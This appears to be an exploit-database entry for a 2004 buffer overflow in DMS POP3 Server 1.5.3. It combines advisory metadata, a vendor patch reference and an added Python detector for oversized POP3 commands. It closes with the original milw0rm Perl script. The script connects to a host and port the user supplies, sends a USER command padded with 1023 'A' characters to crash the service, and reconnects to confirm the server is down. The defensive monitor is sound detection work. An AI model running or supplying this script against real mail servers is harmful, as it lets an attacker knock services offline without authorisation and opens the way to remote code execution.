Vendor: DMS POP3 Server
By: milw0rm.com
CVSS: 7.5 (HIGH)
Type: Buffer Overflow
CWE: 121
Product Name: DMS POP3 Server
Affected Version From: Windows 2000/XP 1.5.3 build 37
Affected Version To: Unknown
Patch Exists: YES
Related CWE:
CPE: a:dms:dms_pop3_server:1.5.3
Metasploit:
Other Scripts:
Platforms Tested:
2004

DMS POP3 Server Overflow

This script exploits a buffer overflow vulnerability in DMS POP3 Server for Windows 2000/XP, version 1.5.3 build 37. It sends a long string of 'A' characters as the username in the POP3 USER command, which crashes the server and potentially allows remote code execution. The script attempts to kill the DMS POP3 service by sending the malicious username, then reconnects to check whether the service is still running. This vulnerability was discovered in 2004.

Mitigation:

Apply the patch provided by the vendor to fix the buffer overflow vulnerability. The patch can be downloaded from the vendor's website at http://www.digitalmapping.sk.ca/pop3srv/Update.asp.
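
Where the patch cannot be applied immediately, an oversized USER command can be caught at a proxy or sensor in front of the server. The following is an added example, not part of the original advisory or the vendor's code: it checks client-to-server POP3 bytes against the 40-character argument limit of RFC 1939 and the 255-octet command-line limit of RFC 2449, including the case where no CRLF ever arrives. The names `Pop3LengthMonitor` and `scan` and the sample streams are constructed for illustration.

```python
MAX_LINE = 255  # RFC 2449: max command line length in octets, CRLF included
MAX_ARG = 40    # RFC 1939: max length of a single argument

class Pop3LengthMonitor:
    """Watches one client-to-server POP3 byte stream for oversized commands."""

    def __init__(self):
        self.buf = b""
        self.alerts = []      # (verb, argument length, reason)
        self.closed = False   # set once a line-length violation is seen

    def feed(self, data: bytes):
        if self.closed:
            return self.alerts
        self.buf += data
        while b"\n" in self.buf and not self.closed:
            line, self.buf = self.buf.split(b"\n", 1)
            self._check(line.rstrip(b"\r"), terminated=True)
        # Judge the partial line too: an oversized command may never be
        # followed by CRLF, so waiting for a terminator would miss it.
        if not self.closed and len(self.buf) + 2 > MAX_LINE:
            self._check(self.buf, terminated=False)
        return self.alerts

    def _check(self, line: bytes, terminated: bool):
        verb, _, arg = line.partition(b" ")
        verb = verb.upper().decode("ascii", "replace")
        if len(line) + 2 > MAX_LINE:
            suffix = "" if terminated else ", no CRLF seen"
            self.alerts.append((verb, len(arg), "line over 255 octets" + suffix))
            self.closed = True  # stop parsing; a server should drop the session
        elif verb == "USER" and len(arg) > MAX_ARG:
            self.alerts.append((verb, len(arg), "USER argument over 40 octets"))

def scan(chunks):
    """Feed an iterable of byte chunks through a fresh monitor."""
    mon = Pop3LengthMonitor()
    for chunk in chunks:
        mon.feed(chunk)
    return mon.alerts

# Constructed sample streams (not captured traffic).
NORMAL = [b"USER alice\r\n", b"PASS example\r\n"]
LONG_USER = [b"USER " + b"B" * 60 + b"\r\n"]
OVERSIZED = b"USER " + b"A" * 1023  # same shape as the script's request
OVERSIZED_CHUNKS = [OVERSIZED[i:i + 100] for i in range(0, len(OVERSIZED), 100)]

if __name__ == "__main__":
    for name, s in [("normal", NORMAL), ("long", LONG_USER), ("big", OVERSIZED_CHUNKS)]:
        print(name, scan(s))
```

Servers that follow RFC 2449 may accept usernames longer than 40 characters, so the 40-octet rule is best treated as a lower-severity signal than the 255-octet one.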

Exploit-DB raw data:

#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl <ip> <port>
#        DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
#####################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
				    PeerPort => $ARGV[1],
				    Proto    => "TCP"))
{
	print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";

	sleep(1);

	print $socket "USER " . "A" x 1023;

	close $socket;

	sleep(1);

	if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
					    PeerPort => $ARGV[1],
					    Proto    => "TCP"))
	{
		close $socket;

		print "failed!\n";
	}
	else
	{
		print "successful!\n";
	}
}
else
{
	print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}

# milw0rm.com [2004-11-21]